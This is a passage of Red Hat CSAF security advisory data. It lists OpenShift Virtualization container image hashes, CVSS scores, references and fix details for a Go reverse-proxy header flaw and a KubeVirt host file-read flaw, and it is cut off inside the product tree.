"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107383", }, ], notes: [ { category: "description", text: "A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-32148", }, { category: "external", summary: "RHBZ#2107383", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-32148", url: "https://www.cve.org/CVERecord?id=CVE-2022-32148", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", }, { category: "external", summary: "https://go.dev/issue/53423", url: "https://go.dev/issue/53423", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", }, ], }
rhsa-2022_6681
Vulnerability from csaf_redhat
Published
2022-09-22 08:16
Modified
2024-11-22 18:27
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.9.6 images:
RHEL-8-CNV-4.9
==============
cnv-must-gather-container-v4.9.6-7
kubevirt-template-validator-container-v4.9.6-6
kubevirt-ssp-operator-container-v4.9.6-5
virt-cdi-uploadserver-container-v4.9.6-4
virt-cdi-cloner-container-v4.9.6-4
virt-cdi-importer-container-v4.9.6-4
virt-cdi-uploadproxy-container-v4.9.6-4
virt-cdi-apiserver-container-v4.9.6-4
virt-cdi-controller-container-v4.9.6-4
virt-cdi-operator-container-v4.9.6-4
hostpath-provisioner-container-v4.9.6-3
hyperconverged-cluster-webhook-container-v4.9.6-3
hyperconverged-cluster-operator-container-v4.9.6-3
node-maintenance-operator-container-v4.9.6-4
kubevirt-vmware-container-v4.9.6-3
kubevirt-v2v-conversion-container-v4.9.6-3
ovs-cni-plugin-container-v4.9.6-3
cnv-containernetworking-plugins-container-v4.9.6-3
bridge-marker-container-v4.9.6-4
ovs-cni-marker-container-v4.9.6-3
kubemacpool-container-v4.9.6-4
kubernetes-nmstate-handler-container-v4.9.6-5
cluster-network-addons-operator-container-v4.9.6-5
virt-controller-container-v4.9.6-9
virt-handler-container-v4.9.6-9
virt-api-container-v4.9.6-9
virt-operator-container-v4.9.6-9
virt-artifacts-server-container-v4.9.6-9
virt-launcher-container-v4.9.6-9
libguestfs-tools-container-v4.9.6-9
virtio-win-container-v4.9.6-3
hostpath-provisioner-operator-container-v4.9.6-3
vm-import-operator-container-v4.9.6-3
vm-import-controller-container-v4.9.6-3
vm-import-virtv2v-container-v4.9.6-3
hco-bundle-registry-container-v4.9.6-51
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This advisory contains the following OpenShift Virtualization 4.9.6 images:\n\nRHEL-8-CNV-4.9\n==============\ncnv-must-gather-container-v4.9.6-7\nkubevirt-template-validator-container-v4.9.6-6\nkubevirt-ssp-operator-container-v4.9.6-5\nvirt-cdi-uploadserver-container-v4.9.6-4\nvirt-cdi-cloner-container-v4.9.6-4\nvirt-cdi-importer-container-v4.9.6-4\nvirt-cdi-uploadproxy-container-v4.9.6-4\nvirt-cdi-apiserver-container-v4.9.6-4\nvirt-cdi-controller-container-v4.9.6-4\nvirt-cdi-operator-container-v4.9.6-4\nhostpath-provisioner-container-v4.9.6-3\nhyperconverged-cluster-webhook-container-v4.9.6-3\nhyperconverged-cluster-operator-container-v4.9.6-3\nnode-maintenance-operator-container-v4.9.6-4\nkubevirt-vmware-container-v4.9.6-3\nkubevirt-v2v-conversion-container-v4.9.6-3\novs-cni-plugin-container-v4.9.6-3\ncnv-containernetworking-plugins-container-v4.9.6-3\nbridge-marker-container-v4.9.6-4\novs-cni-marker-container-v4.9.6-3\nkubemacpool-container-v4.9.6-4\nkubernetes-nmstate-handler-container-v4.9.6-5\ncluster-network-addons-operator-container-v4.9.6-5\nvirt-controller-container-v4.9.6-9\nvirt-handler-container-v4.9.6-9\nvirt-api-container-v4.9.6-9\nvirt-operator-container-v4.9.6-9\nvirt-artifacts-server-container-v4.9.6-9\nvirt-launcher-container-v4.9.6-9\nlibguestfs-tools-container-v4.9.6-9\nvirtio-win-container-v4.9.6-3\nhostpath-provisioner-operator-container-v4.9.6-3\nvm-import-operator-container-v4.9.6-3\nvm-import-controller-container-v4.9.6-3\nvm-import-virtv2v-container-v4.9.6-3\nhco-bundle-registry-container-v4.9.6-51\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6681", url: "https://access.redhat.com/errata/RHSA-2022:6681", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2092269", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092269", }, { category: "external", summary: "2097313", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097313", }, { category: "external", summary: "2101174", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101174", }, { category: "external", summary: "2110783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110783", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118317", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118317", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6681.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update", tracking: { current_release_date: "2024-11-22T18:27:44+00:00", generator: { date: "2024-11-22T18:27:44+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6681", initial_release_date: "2022-09-22T08:16:30+00:00", revision_history: [ { date: "2022-09-22T08:16:30+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-22T08:16:30+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-22T18:27:44+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.9 for RHEL 8", product: { name: "CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.9::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", 